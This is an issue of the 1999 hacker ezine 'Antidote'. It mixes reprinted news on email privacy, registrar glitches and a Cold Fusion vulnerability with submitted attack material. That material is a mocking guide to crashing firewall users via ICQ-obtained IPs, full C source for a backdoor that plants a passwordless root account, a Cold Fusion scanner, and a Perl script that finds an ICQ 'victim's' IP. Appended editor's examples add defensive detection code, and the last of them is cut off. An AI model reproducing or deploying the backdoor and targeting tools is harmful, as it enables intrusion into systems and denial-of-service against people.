Antidote Volume 2 Issue 2 (5/ /99)

------------------------------

Well, here is another ezine put out by Antidote. This is our 5th issue. We have over 380 subscribers so far and we hope to get more. Please keep in mind that this is an educational ezine and we are not responsible for any information in here that you might use in the wrong and improper way. Also, please keep in mind that just because we 'print' this information, it doesn't mean that we made the thing or the exploit up. Most everything in this magazine is made by someone else and is received second hand (sent to us), and is printed/posted here by us.

--=\\Contents\\=--

0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing

1.00 - News & Exploits
1.01 - Erasing Trails
1.02 - Domain Name Glitch
1.03 - Java Glitch
1.04 - Security Hole in Firewalls
1.05 - backdoor.c
1.06 - Cold Fusion Scanner
1.07 - UIN2IP

2.00 - Misc.
2.01 - Hacking Group Report
2.02 - AntiOnline
2.03 - Cold Fusion

----------------------------

--=\\0.00\\=--

0.01 --=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because that would be wrong. We don't claim to be a hacking magazine. All Antidote is, basically, is current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits.
Mainly, Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc., then you might want to go to your local bookstore and see if they carry '2600'.

----------------------------

0.02 --=\\FAQ\\=--

Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions; if your question isn't on here, or the answer doesn't make sense, then you can e-mail us with it.

> What exactly is "Antidote"?

See section 0.01 for a complete description.

> I find Antidote is not aimed at the beginner and does not teach you the basics, why is that?

Antidote is for everyone. All we basically are is a news ezine that comes out once a month with the current news, exploits, flaws and even programming. All of the articles in here are received second hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage, is there any way I can get them sent to me through e-mail?

Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive Antidote the second we release it, and it will be sent as an attachment.

> If I want to submit something, are there any 'rules'?

Please see section 0.04 (Writing) for a complete description.

> If I submitted something, can I remain anonymous?

Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue, why is that?

It could be that someone else wrote something similar to what you wrote and they sent it to us first.
If you sent us something and we didn't e-mail you back, then you might want to send it again, because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?

Yes you can, we take information that is written by anyone, regardless of whether you wrote it or not.

Well, that's it for our FAQ. If you have a question that is not on here, or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

----------------------------

0.03 --=\\Shouts\\=--

These are just some shout outs that we feel we owe to some people. Some are individuals and some are groups in general. If you are not on this list and you feel that for some reason you should be, then please contact Lord Oak and he will post you on here, and we are sorry for the misunderstanding. Well, here are the shout outs:

Duece
ox1dation
Lord Oak
Forlorn
Altomo
0dnek
PBBSER
HNN [www.hackernews.com]
Thepoison.org
Retribution
403-security.org
EazyMoney

Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you.

----------------------------

0.04 --=\\Writing\\=--

As many of you know, we are always open to articles/submissions. We will take almost anything that has to do with computer security. This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks, that is fine.
If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we receive two e-mails with the same topic/idea, then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask whether someone has already written on a topic, so that you don't waste your time writing something that won't be published. An example of this would be: if Joe sends us an e-mail with the topic being hacking Hotmail accounts on Thursday, and then Bill sends us an e-mail on hacking Hotmail accounts on Sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and we will review the article and put it in Antidote (if we like it).

----------------------------

--=\\1.00\\=--

1.01 --=\\Erasing Trails\\=--

[www.wired.com]

Email leaves a trail. Zero-Knowledge Systems is out to cover it up.

The Canadian privacy technology start-up said Monday that it had signed up 50 Internet service providers and networks to its Freedom Network, a software-service combination meant to bring more anonymity to Net users.

"This represents the first time that ISPs have taken concrete steps to address users' privacy concerns," said Austin Hill, president of Zero-Knowledge Systems, in a statement. The company announced the news at this week's ISPCon in Baltimore.

Mail servers at participating ISPs and networks use the service to encrypt an email message's data and route it via an untraceable path, Zero-Knowledge said. Zero-Knowledge says the technique protects users from uninvited scrutiny of their online activities.
The 50 participating providers and networks -- which don't include any high-profile US ISPs -- are located in the United States, Great Britain, the Netherlands, Japan, Canada, Austria, and Australia.

Also announced at ISPCon on Monday was a plan by Inktomi and Sandpiper Networks to merge two technologies that take different approaches to speeding the delivery of Web pages to end users.

Sandpiper Networks said it plans to integrate its Adaptive Content Distribution technology with Inktomi's Traffic Server network caching technology.

Inktomi's Web-caching technology creates local copies of an ISP's most frequently requested pages for its users. The reactive process stores Web content according to the frequency of customers' requests.

Sandpiper's Footprint service is driven more by the decisions of content providers. Heavily visited Web sites sign up for Footprint to expressly get their content on the geographically dispersed Sandpiper Footprint network.

Both systems work on the principle of reducing the network distance between users and Web-page content. The companies said Inktomi's Traffic Server will provide a cache platform to help power Sandpiper's content servers for the Footprint network.

As part of the agreement, Inktomi has also agreed to invest in Sandpiper's $21.5-million, second-round financing. Other investors include America Online, Eagle New Media Investment LLC, an investment affiliate of the Times-Mirror Company, and Hambrecht & Quist.

http://www.wired.com/news/news/technology/story/19327.html

----------------------------

1.02 --=\\Domain Name Glitch\\=--

[www.wired.com]

As the "test period" for new domain name registrars officially began, Network Solutions continued to suffer from technical glitches.

Work was completed on the Internic Registration Services database over the weekend. On Monday, however, a problem at Network Solutions prevented some of its customers from making changes to their domain names.
Network Solutions spokesperson Brian O'Shaughnessy tried to downplay the inconvenience. "It runs the gamut from negligible to probably a fair level of nuisance to registrants who are trying to do some changes to their site."

The Internic database generally lists technical, administrative, and billing contacts, called "handles," for domain name owners. A user must use his or her handle to make changes to a site. For example, if a domain administrator wanted to add to the domain a server with a new IP address, he would have to use his handle -- often an email address -- to notify Network Solutions of the change.

Some domain name handles started disappearing over the weekend, and Network Solutions has yet to determine how many domain name holders have been affected.

"Some files just list the administrative and technical contacts and won't list the billing contact," O'Shaughnessy said. Some customers have complained that none of the contact listings appear for some domains, which was confirmed by searching the Network Solutions database. O'Shaughnessy insisted that the content of the database was still intact internally at Network Solutions.

But some customers were outraged at another in a long string of failures by Network Solutions.

"The handle is the most important thing in the [registration] database," said Danish Internet lawyer and author Dennis Willardt Zewillis. "It is a point of contact -- so that only administrative or technical contact can change domain names around from server to server."

Zewillis' domain, domainnamelaw.com, was missing its contact information when he looked it up on Friday night, and it was still missing on Monday.

"I think [Network Solutions was] trying to hide how easy it is to really mess up the whole domain name system," Zewillis said. "And that's worrying me a lot. It's happening every month."
In January, Zewillis alerted Network Solutions to a far more serious problem: Instead of disappearing, domain name contacts were temporarily reassigned at random to people who were not associated with those domains.

"They were changed so that other people's email addresses were listed as the email contact," he said. "This gave the person listed as the contact the ability to make changes to a domain. [A man in Canada who was assigned control over a spate of domains] could have totally messed around with 100,000 domains."

Zewillis said that, at the very least, Network Solutions should have notified customers about this problem.

Other users reported the same problem on Internet mailing lists on Monday. Some were equally dissatisfied with Network Solutions' response that their contact information would reappear at some point in the near future.

Derrick Bennett, who runs a domain name management company, agreed that it was the latest in a series of problems.

"The only technical effect this has is in the time I have wasted calling NetSol's non-800 number [to find out what was wrong] and the time I will spend next week checking all of my domains again," said Bennett.

Two months ago, Bennett said, a domain that his company managed was mistakenly redirected to another Web site. "They had done a global DNS change for another customer and accidentally changed my customer's record to point at another DNS server." It took two days to fix and cost his customer time and lost revenue "for something they have no control over and no recourse for," Bennett said.

Network Solutions attributes the problems to the growth of the Internet.

"You're dealing with an industry that is essentially the fastest-growing segment of the Internet," O'Shaughnessy said. "More people are getting on the Net and they have to go through Network Solutions."
http://www.wired.com/news/news/technology/story/19342.html

----------------------------

1.03 --=\\Java Glitch\\=--

There is a new bug that causes the Windows 95 and 98 operating systems to crash. Joseph Ashwood (the 'founder') said that it keeps creating multiple computing processes called "threads". What it does is keep creating these threads until the system runs out of memory (or RAM), forcing you to reboot your computer. Microsoft and Sun identified or called this program a "denial of service attack" (or a DoS), considering that it overloads the system and slows it down. For more information, visit Joseph Ashwood's homepage, which is located at: http://www-scf.usc.edu/~ashwood

----------------------------

1.04 --=\\Security Hole in Firewalls\\=--

SECURITY HOLES IN CONSEAL PC FIREWALLS

Another security hole in the Conseal PC Firewall, a.k.a. signal9. Just think of all the wanna-be "hackers" that are going to crash cuz of this DoS/OOB attack. I think it is funny as hell. This trick works best with ICQ and IRC.

I write this for educational use only!! If you get kicked off your ISP cuz you did not do it right, it is your own damn fault, not mine.

Here we go. First off, get the victim's IP# off ICQ or on IRC. They could be spoofed; type this to get the real IP# on IRC: /dns . Which gives: =+user@194.134.10.162. This is his true IP #4. Now once again you /dns 194.134.10.162. This time, there is a response: Resolved to

If he/she has you on their ignore list on ICQ, then make another account and re-add that UIN#, or try to find someone they're talking to that is on the victim's list and is on your list too; either way you'll get their IP#. What you've got to do now is open an exploit (nestea or boink, newtear etc. for Linux) (the best to use is Exploit Generator v0.85 for Windows), run a netstat "dns their ip#", and get the port open from that host.
You should now have the victim's IP# and port. Then send a packet, just 1, from a recognized host they talk to seldomly. "Note": 79% of firewall users have such fucked up rulesets or so many incoming hosts that they let 1 packet through. That packet is let through on their ruleset, so it registers =) ding! It may take a while for the packet to send the whole fragment, but within a matter of seconds... Boom, watch the dumb fuck go offline.

There are other ways of forcing backdoors open on Conseal PC Firewall, "considering it has 2 flaws". As is said by many firewall analysts, "Conseal PC Firewall" is the most secure firewall to prevent attacks by hackers. Well, you analyzers, check twice next time :) This has been tested against Win NT 4.0, Win 95/98. I would like to say about 99%, considering you have some firewall warrior out amongst us. This is good to prove to people that think they're really secure that they ain't got shit, basically. Even lamers can prove them wrong.

EazyMoney
eazy_money@Cyber-Strike.com

----------------------------

1.05 --=\\backdoor.c\\=--

/* A rip off a sockets tutorial i found somewhere cause I didn't feel like
   writing stupid basic sockets code when I had it in my src directory already. */

/* Greets:
   Undernet Channels: #rootworm, #hacktech, #hyperlink, #3xposure, #legionoot
   Groups: The LegionOOT (www.legionoot.cc), Team Sploit
   People: Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t, F-o-X, NeonMatrix,
           Azmodan, & Venomous

   Usage (setup):
     # gcc -o backdoor backdoor.c
     # ./backdoor password &

   Usage (using):
     telnet to host (port 505) --> type the password (don't wait for a prompt,
     there isn't one so its less obvious its a backdoor) --> type 1 or 2.
     And yes it's _supposed_ to disconnect you after each command. */

/* The header names were lost in extraction; these are the standard headers
   the code below needs, restored by the editor. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 505
#define MAXDATASIZE 100
#define BACKLOG 10

void handle(char *command);

int main(int argc, char *argv[])
{
    int sockfd, new_fd, sin_size, numbytes;
    char *bytes;
    struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;
    char buf[MAXDATASIZE];
    char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to send '7h1s b0x 1s 0wn3d' to all people on the box: ";

    if (argc != 2) {
        fprintf(stderr,"Usage: %s password\n", argv[0]);
        exit(1);
    }
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        exit(1);
    }
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(PORT);
    my_addr.sin_addr.s_addr = INADDR_ANY;
    if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
        perror("bind");
        exit(1);
    }
    if (listen(sockfd, BACKLOG) == -1) {
        perror("listen");
        exit(1);
    }
    while(1) {  /* main accept() loop */
        sin_size = sizeof(struct sockaddr_in);
        if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) {
            perror("accept");
            continue;
        }
        inet_ntoa(their_addr.sin_addr);
        if (!fork()) {  /* child: one connection, then exit */
            recv(new_fd, buf, MAXDATASIZE, 0);
            bytes = strstr(buf, argv[1]);   /* password anywhere in the first read */
            if (bytes != NULL){
                send(new_fd, ask, sizeof(ask), 0);
                numbytes=recv(new_fd, buf, MAXDATASIZE, 0);
                buf[numbytes] = '\0';
                handle(buf);
            }
            close(new_fd);
            exit(0);
        }
        close(new_fd);
        while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child processes */
    }
}

void handle(char *command)
{
    FILE *fle;
    if(strstr(command, "1") != NULL) {
        fle = fopen("/etc/passwd", "a+");
        fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash");
        fclose(fle);
    }
    if(strstr(command, "2") != NULL) {
        system("wall 7h1s b0x 1s 0wn3d");
    }
}

PBBSER
pbbser@legionoot.hypermart.net

----------------------------

1.06 --=\\Cold Fusion Scanner\\=--

/* COLD FUSION VULNERABILITY TESTER - Checks for the l0pht advisory
   "Cold Fusion Application Server Advisory" dated 4.20.1999
   you can find a copy of this advisory and all other l0pht Security
   Advisories here: http://www.l0pht.com/advisories.html

   much of this program was blatantly copied from the cgi scanner released
   about a week ago, written by su1d sh3ll... I just want to give credit
   where credit is due... this particular scanner was "written" (basically
   modified) by hypoclear of lUSt - Linux Users Strike Today...

   I know that it is trivial to check to see if a server is vulnerable, but
   I had fun doing this so who the heck cares if I want to waste my time...

   while I'm here I minds well give shout outs to:
   Phrozen Phreak (fidonet rules)
   Special K (you will never get rid of my start button ;-)
   go powerpuff girls (he he) ;-)

   compile: gcc -o coldscan coldscan.c
   usage:   coldscan host
   tested on: IRIX Release 5.3 (this should compile on most *NIX systems though) */

/* The header names were lost in extraction; these are the standard headers
   the code below needs, restored by the editor. Unused variables and a
   stray connect() before the loop were dropped. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in sin;
    struct hostent *he;
    char foundmsg[] = "200";   /* an HTTP 200 status line means the page is served */
    char *cgistr;
    int count=0;
    int numin;
    char cfbuff[1024];
    char *cfpage[5];
    char *cfname[5];

    cfpage[1] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
    cfpage[2] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
    cfpage[3] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";
    cfname[1] = "openfile.cfm ";
    cfname[2] = "displayopenedfile.cfm ";
    cfname[3] = "exprcalc.cfm ";

    if (argc<2) {
        printf("\n-=COLD FUSION VULNERABILITY TESTER=-");
        printf("\nusage - %s host \n",argv[0]);
        exit(0);
    }
    if ((he=gethostbyname(argv[1])) == NULL) {
        herror("gethostbyname");
        exit(0);
    }
    printf("\n-=COLD FUSION VULNERABILITY TESTER=-\n");
    printf("scanning...\n\n");

    /* one TCP connection per page: each request is a separate HTTP/1.0 exchange */
    while(count++ < 3) {
        sock=socket(AF_INET, SOCK_STREAM, 0);
        bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
        sin.sin_family=AF_INET;
        sin.sin_port=htons(80);
        if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) {
            perror("connect");
        }
        printf("Searching for %s : ",cfname[count]);
        for(numin=0;numin < 1024;numin++) {
            cfbuff[numin] = '\0';
        }
        send(sock, cfpage[count],strlen(cfpage[count]),0);
        /* leave the last byte as the terminator so strstr() cannot run off the buffer */
        recv(sock, cfbuff, sizeof(cfbuff)-1,0);
        cgistr = strstr(cfbuff,foundmsg);
        if( cgistr != NULL)
            printf("Exists!\n");
        else
            printf("Not Found\n");
        close(sock);
    }
    return 0;
}

----------------------------

1.07 --=\\UIN2IP\\=--

#!/usr/bin/perl
#
# coded, (i.e. slapped together in a lazy-ass way) by Dr. Labrat
#
# Disclaimer: If you use this to F*ck someone up, you are a bad, bad person.
# It wasn't me. You are on your own.
#
# Simple- give it a UIN and it will try to give you the IP address of the
# victim.
#
# Only works if the user is online and is using the ICQ webserver, but then
# that is probably what you need anyhow :-)
# see www.labrat.cx for icqget.pl for getting files from the victim...
# Thought for the day: Using this makes you a script-kiddie.
#
# Thx to Packet St0rm

use IO::Socket;
use IO::Handle;

$uin=$ARGV[0];
$iaddr= gethostbyname("members.icq.com");
if ($uin) {
    $url = "/$uin";
} else {
    die "No uin - Duh.\n";
}
$port = 80;
$proto = getprotobyname("tcp");
$paddr = sockaddr_in($port, $iaddr);
print "ICQ UIN to IP resolver, by Dr. Labrat\n";
socket(DATA, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(DATA, $paddr) or die "Connect error: $!";
autoflush DATA 1;
print "Connected to members.icq.com...\n";
print "Trying to resolve UIN: $uin\n";
print DATA "GET $url HTTP/1.0\r\n\r\n\r\n";
@data=<DATA>;   # read the whole reply; the <DATA> readline was lost in extraction and is restored here
if ( $data[0]=~/OK/){
    foreach $chunk (@data) {
        if ( $chunk=~/myhome.gif/) {
            print "Found UIN\n";
            $sneak=$chunk;
            last;
        }
    }
}
if ($sneak) {
    print "Snarfed the IP address!\n";
} else {
    die "User not online or not running ICQ webserver, maybe doesn't even exist!\n";
}
@ip=split(/\"/,$sneak);
$realip=substr($ip[1], 7,15);
print "\n$realip\n\n";
print "Done....\n";
close DATA;

----------------------------

--=\\2.00\\=--

2.01 --=\\Hacking Group Report\\=--

With more and more people connecting to the Internet these days, there's bound to be more new hackers and hacking groups. In this issue of Antidote we will be looking at a group that goes by the name of "The Hong Kong Danger Duo". They claim not to be elite, and they call themselves 'script kiddies', but "The Hong Kong Danger Duo" (HKDD) seems to be far from that. They strike here and there, but when they do, their creative and funny web pages are a sight to behold. The members of HKDD, which are Kung-P00, SpecialK, B0y wund3r, Jamaican J1m, Butt3ry L0bster M4n, and Phel0n, bring a sense of humor to the otherwise dull and un-inventive web page hacks in recent history. The HKDD are truly innovative and intelligent because they bring back the humor in web page hacking. Unlike most hacks that only have "w3 0wn j00.. fj34|2 0u|2 3|2337 |20071n' 4b1l17135 f00" or something gay like that, the HKDD have creative and colorful pages that poke fun at the admin, whoever they are flaming at that time, and show off their elite HTML skills. Hopefully in the near future, Antidote would like to have an interview with the HKDD. If you ever get the chance to see a HKDD hack, it's worth it.

0dnek

----------------------------

2.02 --=\\Antionline.com\\=--

Yep.
Antionline.com. It's gayer than ever. With its new site Anticode.com, and the promotion of Caroline Meinel's "Hacker Wargames", John Varenimastupidbitch, also known as JP, seems to be getting newer and gayer ideas to help Antionline.com become somewhat popular, which will never happen.

Anticode.com is played off to be a "Site for security consultants", which basically means that it's a cheap Rootshell.com rip-off. It offers exploits, sniffers, and virus code on its web site to promote computer security. Even though the exploits are organized by OS and have descriptions by them, which is the only good thing about the entire site, it still remains gay and doesn't need to be visited.

Along with the gayness of Anticode.com is the promotion of Caroline Meinel's "Hacker Wargames". The games seem to be posted and run to help teach people about computer security without breaking the law. "This isn't to train computer criminals," says one site associated with the "Hacker Wargames". But what else do they expect by offering completely vulnerable servers to the public without fear of getting busted? Doesn't make much sense, huh? The "Wargames" has a couple of boxes open and a Cisco Router to hack into, also. Along with these boxes are hints to l/p's for each box and for the Cisco Router, so someone looking to learn a little bit more about computer security can log into the box of their choice and attempt to root the server. The award for wasting your time is your own personal web page on the server you rooted. But remember, they're not trying to train computer criminals.

0dnek

----------------------------

2.03 --=\\Cold Fusion\\=--

As many of you saw last issue, we had the new Cold Fusion vulnerability. This has caused a lot of problems for many servers and virtually hosted domains. Many sites have been vandalized because of this bug, and it has happened repeatedly to each server / domain.
An example of this would be www.towngreen.com: they have been hacked 8 times, of which 4 were because of the Cold Fusion vulnerability. Many sites / servers are finally picking up on this and fixing it. Since all of the servers are fixing this problem, the press is picking up on it also; here is an article that I found on ZDNet:

Article from: http://www.zdnet.com/zdnn/stories/news/0,4586,1014542,00.html

Hackers whack ColdFusion users
By Jim Kerstetter and Antone Gonsalves, PC Week
April 29, 1999 3:09 PM PT

New research on a five-month-old security vulnerability has put hackers on the prowl and a software company on the hot seat.

Last week, L0pht, a site that devotes itself to discussions on computer security, posted a warning about a vulnerability in the remote administration features of Allaire Corp.'s ColdFusion Application Server. The vulnerability enables a hacker to gain access to all the data stored on that Web server and, in the process, install software to create a back door into the rest of the network.

Since that warning was posted last week -- along with a patch from Allaire (Nasdaq:ALLR) -- security experts estimate that more than 100 sites have been hit.

Example app is to blame

Adam Berrey, product marketing director for ColdFusion, said the security breach resulted from an example application that shipped with the server's documentation. Once the application was deployed, a hacker could use it as a doorway to files on the server.

"In February, when we first discovered this issue, we sent out an e-mail to all of our registered customers, and we also proactively contacted all of our key accounts," Berrey said. "We may not have the name of every single customer in our database but I think we've done a very aggressive job."

But customers are questioning whether Allaire did do enough to warn them. One of the companies that was missed was NetGrocer Inc., of New York.
Ari Sabah, vice president of technology, said one of his developers learned of the problem from an e-mail sent by a friend who also worked with ColdFusion. The security flaw and the availability of a patch on Allaire's Web site had been discussed on the site's discussion group.

"Officially, we didn't get anything from [Allaire]," said an annoyed Sabah. "They were too busy going public. They forgot their customers and they forgot who got them there."

Berrey said a patch for the problem was posted on Allaire's Web site during the first week of February and a maintenance release of the server, ColdFusion 4.01, will be available Friday for free download from the company's site.

Hard hit

Still, the ColdFusion hack is not necessarily new. In December, Phrack Magazine first publicized the vulnerability. But it wasn't until the past several weeks that it gained the attention of hackers, who have made it clear that many ColdFusion users haven't installed the patch.

One site, a West Coast ISP that hosts at least 30 domains, was particularly hard hit. A hacker, going by the name of MostHateD of GlobalHell, was able to penetrate the company's Web server and gain access to at least three hard drives. In the process, the hacker claimed to have gained access to banking records, mail server passwords, illegally copied software, and even a "nuke" utility -- an illegal piece of software that can be used to launch a denial of service attack against another server.

The vulnerability ties into remote administration tools with ColdFusion that are exposed by the sample application. Allaire has its own server-side scripts, similar to CGI, that can be manipulated by an attacker. Once inside, the attacker can upload and download files and replace binary files, said Chris Rouland, director of Internet Security Systems Inc.'s X-Force consulting group. Rouland analyzed the attack after being alerted to it by PC Week.
"If you can replace a binary on a computer system, you can back door it and force it to do whatever you want to do," he said.

Allaire, of Cambridge, Mass., completed its initial public offering of 2.5 million shares in January.

If you don't know what the Cold Fusion Vulnerability is, then please see Antidote Vol2 Issue1.

Lord Oak
lordoak@thepoison.org

----------------------------

Antidote is an HNN Affiliate
http://www.hackernews.com

All ASCII art in Antidote is done by Lord Oak and permission is needed before using it.
Copyright Thepoison.org 1998, all rights reserved.
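Editor's added example for section 1.04 (not part of EazyMoney's article or of Antidote). The tools named there, nestea, boink and newtear, are to the editor's knowledge members of the teardrop family, which sends IP fragments whose offsets overlap or whose sum runs past the maximum datagram size; the article itself only says the packet is "let through on their ruleset" and that it arrives as a fragment. The check below is the reassembly-side sanity test a firewall or IDS applies before it accepts a fragment set, generalised to any overlapping or oversized set rather than one tool's exact layout. The Fragment type and the fragment records are constructed for the demonstration; no capture is parsed.

```python
"""Sanity check for a set of IP fragments before reassembly.

Editor's added example, not code from the article. Fragment is a constructed
record: byte offset and payload length (after the 8-byte unit has been
applied), plus the MF flag."""

from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

MAX_DATAGRAM = 65535   # largest IPv4 datagram the total-length field allows


class Fragment(NamedTuple):
    src: str
    dst: str
    ident: int       # IP identification field, shared by all fragments of one datagram
    offset: int      # byte offset of this fragment's payload within the datagram
    length: int      # payload bytes carried by this fragment
    more: bool       # the MF (more fragments) flag


def check_fragment_set(frags: List[Fragment]) -> List[str]:
    """Return the problems found in one datagram's fragments (empty if sane).

    Fragments are examined in offset order; a fragment that starts before the
    end of data already seen overlaps it, and any fragment that would write
    past MAX_DATAGRAM cannot belong to a legal datagram.
    """
    problems = []
    ordered = sorted(frags, key=lambda f: f.offset)
    end_seen = 0
    for f in ordered:
        if f.length == 0 and f.more:
            problems.append(f"zero-length fragment at offset {f.offset}")
        if f.offset < end_seen:
            problems.append(
                f"fragment at offset {f.offset} overlaps previous data ending at {end_seen}"
            )
        if f.offset + f.length > MAX_DATAGRAM:
            problems.append(f"fragment at offset {f.offset} extends past {MAX_DATAGRAM} bytes")
        end_seen = max(end_seen, f.offset + f.length)
    return problems


def audit_fragments(frags: List[Fragment]) -> Dict[Tuple[str, str, int], List[str]]:
    """Group fragments by (src, dst, id) and report only the sets that fail."""
    groups = defaultdict(list)
    for f in frags:
        groups[(f.src, f.dst, f.ident)].append(f)
    result = {}
    for key, fs in groups.items():
        probs = check_fragment_set(fs)
        if probs:
            result[key] = probs
    return result


# Constructed samples: a normal two-fragment datagram, and a set whose second
# fragment starts inside the first (the overlap a reassembler must reject).
NORMAL = [
    Fragment("10.0.0.2", "10.0.0.9", 100, 0, 1480, True),
    Fragment("10.0.0.2", "10.0.0.9", 100, 1480, 520, False),
]
OVERLAPPING = [
    Fragment("192.0.2.1", "10.0.0.9", 200, 0, 36, True),
    Fragment("192.0.2.1", "10.0.0.9", 200, 24, 4, False),
]

if __name__ == "__main__":
    for key, probs in audit_fragments(NORMAL + OVERLAPPING).items():
        print(key, probs)
```

Dropping a set as soon as `check_fragment_set` returns anything, instead of first assembling it and then deciding, is the point: the crash the article describes happens inside reassembly, so the decision has to be made before the fragments are merged.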
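Editor's added example for section 1.05 (not part of PBBSER's backdoor.c or of Antidote). Option 1 of that backdoor appends `r00t::0:0:r00t:/root:/bin/bash` to /etc/passwd with no trailing newline: a second UID-0 account with an empty password field. The audit below parses passwd text and reports exactly those traces, so it is the check an administrator runs to find out whether the file has been tampered with. The sample passwd text is constructed; `audit_passwd` and `parse_passwd` are the editor's names.

```python
"""Audit /etc/passwd text for the traces a raw append like backdoor.c leaves.

Editor's added example; the sample file below is constructed. Run against a
real file with audit_passwd(open("/etc/passwd").read())."""

from typing import List

PASSWD_FIELDS = ["name", "passwd", "uid", "gid", "gecos", "home", "shell"]

# Constructed sample: three ordinary entries, then the line backdoor.c's
# option 1 appends (no trailing newline, empty password field, UID 0).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
    "r00t::0:0:r00t:/root:/bin/bash"
)


def parse_passwd(text: str) -> List[dict]:
    """Split passwd text into records, keeping malformed lines so they can be flagged."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        rec = {"lineno": lineno, "raw": line}
        if len(fields) == len(PASSWD_FIELDS):
            rec.update(zip(PASSWD_FIELDS, fields))
        records.append(rec)
    return records


def audit_passwd(text: str) -> List[str]:
    """Return one finding per suspicious record.

    Checks: a line that does not have seven fields, a UID-0 account under a
    name other than root, an empty password field (login with no password at
    all), and a file that does not end in a newline, which is what an
    fprintf() append without "\\n" leaves behind.
    """
    findings = []
    for rec in parse_passwd(text):
        if "uid" not in rec:
            findings.append(f"line {rec['lineno']}: malformed entry {rec['raw']!r}")
            continue
        if rec["uid"] == "0" and rec["name"] != "root":
            findings.append(f"line {rec['lineno']}: extra UID-0 account {rec['name']!r}")
        if rec["passwd"] == "":
            findings.append(f"line {rec['lineno']}: empty password field for {rec['name']!r}")
    if text and not text.endswith("\n"):
        findings.append("file does not end with a newline (possible raw append)")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

On a system with shadow passwords the `passwd` field is normally `x`, so an empty field is suspicious on its own even before the UID is looked at; the missing final newline is the cheapest tell, because a legitimate editor or `useradd` always writes one.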
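Editor's added example for sections 1.06 and 2.03 (not code from hypoclear's coldscan.c, from l0pht, Allaire or Antidote). coldscan.c decides a server is exposed when a GET for one of three pages under /cfdocs/expeval/ comes back with an HTTP 200. The same criterion, applied to a web server's own access log, tells an administrator two things at once: whether the sample application is still being served, and which clients have been probing for it. The log lines are constructed, the Common Log Format regex is the editor's own, and `find_probes` and `still_exposed` are the editor's names.

```python
"""Find probes for the ColdFusion sample pages in a CLF access log.

Editor's added example. SAMPLE_LOG is constructed; the three paths are the
ones coldscan.c requests."""

import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# The pages coldscan.c requests, lower-cased for comparison.
SAMPLE_APP_PATHS = (
    "/cfdocs/expeval/openfile.cfm",
    "/cfdocs/expeval/displayopenedfile.cfm",
    "/cfdocs/expeval/exprcalc.cfm",
)

# Common Log Format: host ident authuser [time] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: an ordinary request, one client that found all three
# pages (200), and one probing a server where they are gone (404), with the
# case varied the way a scanner against a Windows file system might.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Apr/1999:14:02:11 -0400] "GET /index.cfm HTTP/1.0" 200 2311
192.0.2.10 - - [29/Apr/1999:14:03:01 -0400] "GET /cfdocs/expeval/openfile.cfm HTTP/1.0" 200 1544
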